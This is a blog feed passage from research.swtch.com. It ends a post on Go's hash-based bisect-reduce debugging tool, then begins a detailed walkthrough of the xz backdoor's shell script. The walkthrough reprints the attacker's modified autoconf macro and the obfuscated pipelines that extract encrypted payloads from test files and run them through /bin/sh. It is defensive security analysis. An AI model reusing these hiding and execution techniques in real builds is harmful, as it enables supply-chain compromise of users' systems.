Looking for a single culprit is a basic walk down the tree.
Even better, the general bisect-reduce algorithm is easily
adapted to hash suffix patterns.
First we have to adjust the definition of <code>buggy</code>:
we need it to tell us the number of matches for the
suffix we are considering, so we know whether
we can stop reducing the case:
<pre>// buggy reports whether the bug is triggered
// by enabling the change at the locations with
// hashes ending in suffix or any of the extra suffixes.
// It also returns the number of locations found that
// end in suffix (only suffix, ignoring extra).
func buggy(suffix string, extra []string) (fail bool, n int)
</pre>
<p>
Now we can translate the easy/hard algorithm more or less directly:
<pre>// BisectReduce returns a locally minimal list of hash suffixes,
// each of which uniquely identifies a single location hash,
// such that buggy(list) is true.
func BisectReduce() []string {
if fail, _ := buggy("none", nil); fail {
return nil
}
return bisect("", []string{})
}
// bisect returns a locally minimal list of hash suffixes,
// each of which uniquely identifies a single location hash,
// and all of which end in suffix,
// such that buggy(result+forced) = true.
//
// Precondition: buggy(suffix, forced) = true, _.
// and buggy("none", forced) = false, 0.
//
// Postcondition: buggy("none", result+forced) = true, 0;
// each suffix in result matches a single location hash;
// and buggy("none", x+forced) = false for any x ⊂ result.
// Also, if there are any valid single-element results,
// then bisect returns one of them.
func bisect(suffix string, forced []string) []string {
if _, n := buggy(suffix, forced); n == 1 {
// Suffix identifies a single location.
return []string{suffix}
}
// If either of 0suffix or 1suffix is sufficient
// by itself, focus there.
if fail, _ := buggy("0"+suffix, forced); fail {
return bisect("0"+suffix, forced)
}
if fail, _ := buggy("1"+suffix, forced); fail {
return bisect("1"+suffix, forced)
}
// Matches from both extensions are needed.
// Otherwise need parts of both halves.
leftReduced := bisect("0"+suffix,
slices.Concat([]string{"1"+suffix"}, forced))
rightReduced := bisect("1"+suffix,
slices.Concat(leftReduced, forced))
return slices.Concat(leftReduce, rightReduce)
}
</pre>
<p>
Careful readers might note that in the easy cases,
the recursive call to <code>bisect</code> starts by repeating the same
call to <code>buggy</code> that the caller did,
this time to count the number of matches for the suffix in question.
An efficient implementation could pass the result of that run to
the recursive call, avoiding redundant trials.
<p>
In this version, <code>bisect</code> does not guarantee to cut the search space in half
at each level of the recursion.
Instead, the randomness of the hashes means that it cuts the search space
roughly in half on average.
That’s still enough for logarithmic behavior when there are
just a few culprits.
The algorithm would also work correctly if the suffixes were
applied to match a consistent sequential numbering instead of hashes;
the only problem is obtaining the numbering.
<p>
The hash suffixes are about as short as the function number ranges
and easily passed on the command line.
For example, a hypothetical Java compiler could use <code>-XX:CIAllowHash=000,10,111</code>.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Function Selection</h2></a>
<p>
The earliest use of hash-based bisect-reduce in Go was for
selecting functions, as in the example we’ve been considering.
In 2015, Keith Randall was working on a new SSA backend for the Go
compiler. The old and new backends coexisted, and the compiler
could use either for any given function in the program being compiled.
Keith introduced an
<a href="https://go.googlesource.com/go/+/e3869a6b65bb0f95dac7eca3d86055160b12589f">environment variable GOSSAHASH</a>
that specified the last few binary
digits of the hash of function names that should use the new backend:
GOSSAHASH=0110 meant “compile only those functions whose names hash
to a value with last four bits 0110.”
When a test was failing with the new backend,
a person debugging the test case
tried GOSSAHASH=0 and GOSSAHASH=1 and then used binary
search to progressively refine the pattern, narrowing the failure down
until only a single function was being compiled with the new backend.
This was invaluable for approaching failures in large real-world tests
(tests for libraries or production code, not for the compiler) that we
had not written and did not understand.
The approach assumed that the failure could always be reduced to
a single culprit function.
<p>
It is fascinating that HotSpot, Cinder, and Go all hit upon the idea
of binary search to find miscompiled functions in a compiler,
and yet all three used different selection mechanisms
(counters, function lists, and hashes).
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: SSA Rewrite Selection</h2></a>
<p>
In late 2016, David Chase was debugging a new optimizer rewrite rule that
should have been correct but was causing mysterious test failures.
He <a href="https://go-review.googlesource.com/29273">reused the same technique</a>
but at finer granularity:
the bit pattern now controlled which functions that rewrite rule
could be used in.
<p>
David also wrote the <a href="https://github.com/dr2chase/gossahash/tree/e0bba144af8b1cc8325650ea8fbe3a5c946eb138">initial version of a tool, <code>gossahash</code></a>,
for taking on the job of binary search.
Although <code>gossahash</code> only looked for a single failure, but it was remarkably helpful.
It served for many years and eventually became <code>bisect</code>.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Fused Multiply-Add</h2></a>
<p>
Having a tool available, instead of needing to bisect manually,
made us keep finding problems we could solve.
In 2022, another presented itself.
We had updated the Go compiler to use floating-point fused multiply-add (FMA)
instructions on a new architecture, and some tests were failing.
By making the FMA rewrite conditional on a suffix of a hash that
included the current file name and line number,
we could apply bisect-reduce to identify the specific line in the source code
where FMA instruction broke the test.
<p>
For example, this bisection finds that <code>b.go:7</code> is the culprit line:
<p>
<img name="hashbisect0" class="center pad" width=254 height=218 src="hashbisect0.png" srcset="hashbisect0.png 1x, hashbisect0@1.5x.png 1.5x, hashbisect0@2x.png 2x, hashbisect0@3x.png 3x, hashbisect0@4x.png 4x">
<p>
FMA is not something most programmers encounter.
If they do get an FMA-induced test failure, having a tool that automatically
identifies the exact culprit line is invaluable.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Language Changes</h2></a>
<p>
The next problem that presented itself was a language change.
Go, like C# and JavaScript, learned the hard way that loop-scoped loop variables
don’t mix well with closures and concurrency.
Like those languages, Go recently changed to <a href="https://go.dev/blog/loopvar-preview">iteration-scoped loop variables</a>,
correcting many buggy programs in the process.
<p>
Unfortunately, sometimes tests unintentionally check for buggy behavior.
Deploying the loop change in a large code base, we confronted truly
mysterious failures in complex, unfamiliar code.
Conditioning the loop change on a suffix of a hash of the source file name and line number
enabled bisect-reduce to pinpoint the specific loop or loops that triggered
the test failures.
We even found a few cases where changing any one loop did not
cause a failure, but changing a specific pair of loops did.
The generality of finding multiple culprits is necessary in practice.
<p>
The loop change would have been far more difficult without
automated diagnosis.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Library Changes</h2></a>
<p>
Bisect-reduce also applies to library changes:
we can hash the caller, or more precisely the call stack,
and then choose between the old and new implementation
based on a hash suffix.
<p>
For example, suppose you add a new sort implementation and
a large program fails.
Assuming the sort is correct, the problem is almost certainly that
the new sort and the old sort disagree about the final order of
some values that compare equal.
Or maybe the sort is buggy.
Either way, the large program probably calls sort in many different places.
Running bisect-reduce over hashes of the call stacks
will identify the exact call stack where using the new sort causes a failure.
This is what was happening in the example at the start of the post,
with a new timer implementation instead of a new sort.
<p>
Call stacks are a use case that only works with hashing,
not with sequential numbering.
For the examples up to this point, a setup pass could number all
the functions in a program or number all the source lines presented
to the compiler, and then bisect-reduce could apply to binary suffixes
of the sequence number.
But there is no dense sequential numbering of all the possible call stacks
a program will encounter.
On the other hand, hashing a list of program counters is trivial.
<p>
We realized that bisect-reduce would apply to library changes
around the time we were introducing the
<a href="https://go.dev/doc/godebug">GODEBUG mechanism</a>,
which provides a framework for tracking and toggling these kinds of
compatible-but-breaking changes.
We arranged for that framework to provide <code>bisect</code> support for all
GODEBUG settings automatically.
<p>
For Go 1.23, we rewrote the <a href="https://go.dev/pkg/time/#Timer">time.Timer</a>
implementation and changed its semantics slightly,
to remove some races in existing APIs
and also enable earlier garbage collection in some common cases.
One effect of the new implementation is that very short timers trigger more reliably.
Before, a 0ns or 1ns timer (which are often used in tests) could take
many microseconds to trigger.
Now, they trigger on time.
But of course, buggy code (mostly in tests) exists that fails
when the timers start triggering as early as they should.
We debugged a dozen or so of these inside Google’s source tree—all of them complex and unfamiliar—and
<code>bisect</code> made the process painless and maybe even fun.
<p>
For one failing test case, I made a mistake.
The test looked simple enough to eyeball, so I spent
half an hour puzzling through how the only timer in the code under test,
a hard-coded one minute timer,
could possibly be affected by the new implementation.
Eventually I gave up and ran <code>bisect</code>.
The stack trace showed immediately that there was a testing middleware layer that
was rewriting the one-minute timeout
into a 1ns timeout to speed the test.
Tools see what people cannot.
<a class=anchor href="#interesting_lessons_learned"><h2 id="interesting_lessons_learned">Interesting Lessons Learned</h2></a>
<p>
One interesting thing we learned while working on <code>bisect</code> is that it is
important to try to detect flaky tests.
Early in debugging loop change failures,
<code>bisect</code> pointed at a completely correct, trivial loop in a cryptography package.
At first, we were very scared: if <i>that</i> loop was changing behavior,
something would have to be very wrong in the compiler.
We realized the problem was flaky tests. A test that fails randomly
causes <code>bisect</code> to make a random walk over the source code,
eventually pointing a finger at entirely innocent code.
After that, we added a <code>-count=N</code> flag to <code>bisect</code> that causes it
to run every trial <i>N</i> times and bail out entirely if they disagree.
We set the default to <code>-count=2</code> so that <code>bisect</code> always does basic
flakiness checking.
<p>
Flaky tests remain an area that needs more work. If the problem being debugged
is that a test went from passing reliably to failing half the time,
running <code>go test -count=5</code> increases the chance of failure by running the test five times.
Equivalently, it can help to use a tiny shell script like
<pre>% cat bin/allpass
#!/bin/sh
n=$1
shift
for i in $(seq $n); do
"$@" || exit 1
done
</pre>
<p>
Then <code>bisect</code> can be invoked as:
<pre>% bisect -godebug=timer allpass 5 ./flakytest
</pre>
<p>
Now bisect only sees <code>./flakytest</code> passing five times in a row as a successful run.
<p>
Similarly, if a test goes from passing unreliably to failing all the time,
an <code>anypass</code> variant works instead:
<pre>% cat bin/anypass
#!/bin/sh
n=$1
shift
for i in $(seq $n); do
"$@" && exit 0
done
exit 1
</pre>
<p>
The <a href="https://man7.org/linux/man-pages/man1/timeout.1.html"><code>timeout</code> command</a>
is also useful if the change has made a test run forever instead of failing.
<p>
The tool-based approach to handling flakiness works decently
but does not seem like a complete solution.
A more principled approach inside <code>bisect</code> would be better.
We are still working out what that would be.
<p>
Another interesting thing we learned is that when bisecting over
run-time changes, hash decisions are made so frequently that
it is too expensive to print the full stack trace of every decision
made at every stage of the bisect-reduce,
(The first run uses an empty suffix that matches every hash!)
Instead, bisect hash patterns default to a “quiet” mode where each
decision prints only the hash bits, since that’s all <code>bisect</code> needs
to guide the search and narrow down the relevant stacks.
Once <code>bisect</code> has identified a minimal set of relevant stacks,
it runs the test once more with the hash pattern in “verbose” mode.
That causes the bisect library to print both the hash bits
and the corresponding stack traces,
and <code>bisect</code> displays those stack traces in its report.
<a class=anchor href="#try_bisect"><h2 id="try_bisect">Try Bisect</h2></a>
<p>
The <a href="https://pkg.go.dev/golang.org/x/tools/cmd/bisect"><code>bisect</code> tool</a>
can be downloaded and used today:
<pre>% go install golang.org/x/tools/cmd/bisect@latest
</pre>
<p>
If you are debugging a <a href="https://go.dev/wiki/LoopvarExperiment">loop variable problem</a> in Go 1.22, you can use
a command like
<pre>% bisect -compile=loopvar go test
</pre>
<p>
If you are debugging a <a href="https://go.dev/change/966609ad9e82ba173bcc8f57f4bfc35a86a62c8a">timer problem in Go 1.23</a>, you can use:
<pre>% bisect -godebug asynctimerchan=1 go test
</pre>
<p>
The <code>-compile</code> and <code>-godebug</code> flags are conveniences.
The general form of the command is
<pre>% bisect [KEY=value...] cmd [args...]
</pre>
<p>
where the leading <code>KEY=value</code> arguments set environment variables
before invoking the command with the remaining arguments.
<code>Bisect</code> expects to find the literal string <code>PATTERN</code> somewhere
on its command line, and it replaces that string with a hash pattern
each time it repeats the command.
<p>
You can use <code>bisect</code> to debug problems in your own compilers or libraries
by having them accept a hash pattern either in the environment or on
the command line and then print specially formatted lines for <code>bisect</code>
on standard output or standard error.
The easiest way to do this is to use
<a href="https://pkg.go.dev/golang.org/x/tools/internal/bisect">the bisect package</a>.
That package is not available for direct import yet
(there is a <a href="https://go.dev/issue/67140">pending proposal</a> to add it to the Go standard library),
but the package is only a <a href="https://cs.opensource.google/go/x/tools/+/master:internal/bisect/bisect.go">single file with no imports</a>,
so it is easily copied into new projects or even translated to other languages.
The package documentation also documents the hash pattern syntax
and required output format.
<p>
If you work on compilers or libraries and ever need to debug why
a seemingly correct change you made broke a complex program,
give <code>bisect</code> a try.
It never stops feeling like magic.
The xz attack shell scripttag:research.swtch.com,2012:research.swtch.com/xz-script2024-04-02T04:00:00-04:002024-04-03T11:02:00-04:00A detailed walkthrough of the xz attack shell script.<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">published the existence of the xz attack</a> on 2024-03-29 to the public oss-security@openwall mailing list. The day before, he alerted Debian security and the (private) distros@openwall list. In his mail, he says that he dug into this after “observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors).”
<p>
At a high level, the attack is split in two pieces: a shell script and an object file. There is an injection of shell code during <code>configure</code>, which injects the shell code into <code>make</code>. The shell code during <code>make</code> adds the object file to the build. This post examines the shell script. (See also <a href="xz-timeline">my timeline post</a>.)
<p>
The nefarious object file would have looked suspicious checked into the repository as <code>evil.o</code>, so instead both the nefarious shell code and object file are embedded, compressed and encrypted, in some binary files that were added as “test inputs” for some new tests. The test file directory already existed from long before Jia Tan arrived, and the README explained “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” This is a fact of life for parsing libraries like liblzma. The attacker looked like they were just <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">adding a few new test files</a>.
<p>
Unfortunately the nefarious object file turned out to have a bug that caused problems with Valgrind, so the test files needed to be updated to add the fix. <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">That commit</a> explained “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” The attackers realized at this point that they needed a better update mechanism, so the new nefarious script contains an extension mechanism that lets it look for updated scripts in new test files, which wouldn’t draw as much attention as rewriting existing ones.
<p>
The effect of the scripts is to arrange for the nefarious object file’s <code>_get_cpuid</code> function to be called as part of a <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC">GNU indirect function</a> (ifunc) resolver. In general these resolvers can be called lazily at any time during program execution, but for security reasons it has become popular to call all of them during dynamic linking (very early in program startup) and then map the <a href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">global offset table (GOT) and procedure linkage table (PLT) read-only</a>, to keep buffer overflows and the like from being able to edit it. But a nefarious ifunc resolver would run early enough to be able to edit those tables, and that’s exactly what the backdoor introduced. The resolver then looked through the tables for <code>RSA_public_decrypt</code> and replaced it with a nefarious version that <a href="https://github.com/amlweems/xzbot">runs attacker code when the right SSH certificate is presented</a>.
<a class=anchor href="#configure"><h2 id="configure">Configure</h2></a>
<p>
Again, this post looks at the script side of the attack. Like most complex Unix software, xz-utils uses GNU autoconf to decide how to build itself on a particular system. In ordinary operation, autoconf reads a <code>configure.ac</code> file and produces a <code>configure</code> script, perhaps with supporting m4 files brought in to provide “libraries” to the script. Usually, the <code>configure</code> script and its support libraries are only added to the tarball distributions, not the source repository. The xz distribution works this way too.
<p>
The attack kicks off with the attacker adding an unexpected support library, <code>m4/build-to-host.m4</code> to the xz-5.6.0 and xz-5.6.1 tarball distributions. Compared to the standard <code>build-to-host.m4</code>, the attacker has made the following changes:
<pre>diff --git a/build-to-host.m4 b/build-to-host.m4
index ad22a0a..d5ec315 100644
--- a/build-to-host.m4
+++ b/build-to-host.m4
@@ -1,5 +1,5 @@
-# build-to-host.m4 serial 3
-dnl Copyright (C) 2023 Free Software Foundation, Inc.
+# build-to-host.m4 serial 30
+dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
dnl Define somedir_c.
gl_final_[$1]="$[$1]"
+ gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
dnl Translate it from build syntax to host syntax.
case "$build_os" in
cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
[$1]_c_make='\"$([$1])\"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+ else
+ gl_[$1]_config=''
+ fi
+ _LT_TAGDECL([], [gl_path_map], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+ _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+ _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
AC_SUBST([$1_c_make])
+
+ dnl If the host conversion code has been placed in $gl_config_gt,
+ dnl instead of duplicating it all over again into config.status,
+ dnl then we will have config.status run $gl_config_gt later, so it
+ dnl needs to know what name is stored there:
+ AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
])
dnl Some initializations for gl_BUILD_TO_HOST.
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
+ dnl Search for Automake-defined pkg* macros, in the order
+ dnl listed in the Automake 1.10a+ documentation.
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
changequote(,)dnl
gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
changequote([,])dnl
</pre>
<p>
All in all, this is a fairly plausible set of diffs, in case anyone thought to check. It bumps the version number, updates the copyright year to look current, and makes a handful of inscrutable changes that don’t look terribly out of place.
<p>
Looking closer, something is amiss. Starting near the bottom,
<pre>gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
if test -n "$gl_am_configmake"; then
HAVE_PKG_CONFIGMAKE=1
else
HAVE_PKG_CONFIGMAKE=0
fi
</pre>
<p>
Let’s see which files in the distribution match the pattern (simplifying the <code>grep</code> command):
<pre>% egrep -Rn '####[[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]]####$'
Binary file ./tests/files/bad-3-corrupt_lzma2.xz matches
%
</pre>
<p>
That’s surprising! So this script sets <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code> and <code>HAVE_PKG_CONFIGMAKE=1</code>. The <code>gl_path_map</code> setting is a <a href="https://linux.die.net/man/1/tr">tr(1)</a> command that swaps tabs and spaces and swaps underscores and dashes.
<p>
Now reading the top of the script,
<pre>gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
</pre>
<p>
extracts the final dot-separated element of that filename, leaving <code>xz</code>. That is, it’s the file name suffix, not a prefix, and it is the name of the compression command that is likely already installed on any build machine.
<p>
The next section is:
<pre>if test "x$gl_am_configmake" != "x"; then
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
else
gl_[$1]_config=''
fi
</pre>
<p>
We know that <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code>, so this sets the <code>gl_[$1]_config</code> variable to the string
<pre>sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null
</pre>
<p>
At first glance, especially in the original quoted form, the <code>sed</code> command looks like it has something to do with line endings, but in fact <code>r\n</code> is the <code>sed</code> “read from file <code>\n</code>” command. Since the file <code>\n</code> does not exist, the command does nothing at all, and then since <code>sed</code> has not been invoked with the <code>-n</code> option, <code>sed</code> prints each line of input. So <code>sed "r\n"</code> is just an obfuscated <code>cat</code> command, and remember that <code>$gl_path_map</code> is the <code>tr</code> command from before, and <code>$gl_[$1]_prefix</code> is <code>xz</code>. To the shell, this command is really
<pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
</pre>
<p>
But right now it’s still just a string; it hasn’t been run. That changes with
<pre>dnl If the host conversion code has been placed in $gl_config_gt,
dnl instead of duplicating it all over again into config.status,
dnl then we will have config.status run $gl_config_gt later, so it
dnl needs to know what name is stored there:
AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
</pre>
<p>
The final <code>"eval \$gl_[$1]_config"</code> runs that command. If we run it on the xz 5.6.0 repo, we get:
<pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +724)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|
eval $i|tail -c +31265|
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|
xz -F raw --lzma1 -dc|/bin/sh
####World####
$
</pre>
<p>
I have inserted some line breaks, here and in later script fragments,
to keep the lines from being too long in the web page.
<p>
Why the Hello and World? The README text that came with the test file describes it:<blockquote>
<p>
bad-3-corrupt_lzma2.xz has three Streams in it. The first and third streams are valid xz Streams. The middle Stream has a correct Stream Header, Block Header, Index and Stream Footer. Only the LZMA2 data is corrupt. This file should decompress if <code>--single-stream</code> is used.</blockquote>
<p>
The first and third streams are the Hello and World, and the middle stream has been corrupted by swapping the byte values unswapped by the <code>tr</code> command.
<p>
Recalling that xz 5.6.1 shipped with different “test” files, we can also try xz 5.6.1:
<pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +939)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|
eval $i|tail -c +31233|
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|
xz -F raw --lzma1 -dc|/bin/sh
####World####
$
</pre>
<p>
The first difference is that the script makes sure (very sure!) to exit if not being run on Linux. The second difference is that the long “<code>export i</code>” line deviates in the final head command offset (724 vs 939) and then the tail offset and the <code>tr</code> argument. Let’s break those down.
<p>
The <code>head</code> command prints a prefix of its input. Let’s look at the start:
<pre>(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 && ...
</pre>
<p>
This discards the first kilobyte of standard input, prints the next two kilobytes, discards the next kilobyte, and prints the next two kilobytes. And so on. The whole command for 5.6.1 is:
<pre>(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
... 16 times total ...
head -c +939
</pre>
<p>
The shell variable <code>i</code> is set to this long command. Then the script runs:
<pre>xz -dc $srcdir/tests/files/good-large_compressed.lzma |
eval $i |
tail -c +31233 |
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" |
xz -F raw --lzma1 -dc |
/bin/sh
</pre>
<p>
The first <code>xz</code> command uncompresses another malicious test file. The <code>eval</code> then runs the <code>head</code> pipeline, extracting a total of 16×2048+939 = 33,707 bytes. Then the <code>tail</code> command keeps only the final 31,233 bytes. The <code>tr</code> command applies a simple substitution cipher to the output (so that just in case anyone thought to pull these specific byte ranges out of the file, they wouldn’t recognize it as a valid lzma input!?). The second <code>xz</code> command decodes the translated bytes as a raw lzma stream, and then of course the result is piped through the shell.
<p>
Skipping the shell pipe, we can run this, obtaining a very long shell script. I have added commentary in between sections of the output.
<pre>$ xz -dc $srcdir/tests/files/good-large_compressed.lzma |
eval $i |
tail -c +31233 |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma1 -dc
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
</pre>
<p>
So far, setting up environment variables.
<pre>[ ! $(uname)="Linux" ] && exit 0 # 5.6.1 only
</pre>
<p>
A line that only appears in 5.6.1, exiting when not run on Linux. In general the scripts in 5.6.0 and 5.6.1 are very similar: 5.6.1 has a few additions. We will examine the 5.6.1 script, with the additions marked. This line is an attempted robustness fix with a bug (pointed out by Jakub Wilk): there are no spaces around the <code>=</code>, making the line a no-op.
<pre>eval $zrKcVq
</pre>
<p>
The first of many odd eval statements, for variables that do not appear to be set anywhere. One possibility is that these are debug prints: when the attacker is debugging the script, setting, say, <code>zrKcVq=env</code> inserts a debug print during execution. Another possibility is that these are extension points that can be set by some other mechanism, run before this code, in the future.
<pre>if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
</pre>
<p>
If <code>config.status</code> exists, we read various variables from it into the shell, along with two extension points. Note that we are still inside the config.status check (let’s call it “if #1”) as we continue through the output.
<pre># Entirely new in 5.6.1
vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null`
if test "x$vs" != "x" > /dev/null 2>&1;then
f1=`echo $vs | cut -d: -f1`
if test "x$f1" != "x" > /dev/null 2>&1;then
start=`expr $(echo $vs | cut -d: -f2) + 7`
ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null`
if test "x$ve" != "x" > /dev/null 2>&1;then
f2=`echo $ve | cut -d: -f1`
if test "x$f2" != "x" > /dev/null 2>&1;then
[ ! "x$f2" = "x$f1" ] && exit 0
[ ! -f $f1 ] && exit 0
end=`expr $(echo $ve | cut -d: -f2) - $start`
eval `cat $f1 | tail -c +${start} | head -c +${end} |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma2 -dc`
fi
fi
fi
fi
</pre>
<p>
This section is entirely new in 5.6.1. It looks for a single test file to contain the magic texts <code>'~!:_ W'</code> and <code>'|_!{ -'</code>, extracts the bytes between them, applies a substitution cipher, decompresses the result, and evaluates the output as a shell script. This appears to be an extension mechanism, so that the next time changes are needed in this script, a new script can be added in a different test file, instead of having to <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">make up reasons to regenerate existing binary test files</a>.
<p>
The next chunk continues with script that was present in 5.6.0.
<pre>eval $zrKccj
if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Two different checks that <a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a> support is enabled. If not, stop the script. The backdoor requires this functionality.
<pre>if test "x$enable_shared" != "xyes";then
exit 0
fi
</pre>
<p>
Require shared library support.
<pre>if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then
exit 0
fi
</pre>
<p>
Require an x86-64 Linux system.
<pre>if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > /dev/null 2>&1; then
exit 0
fi
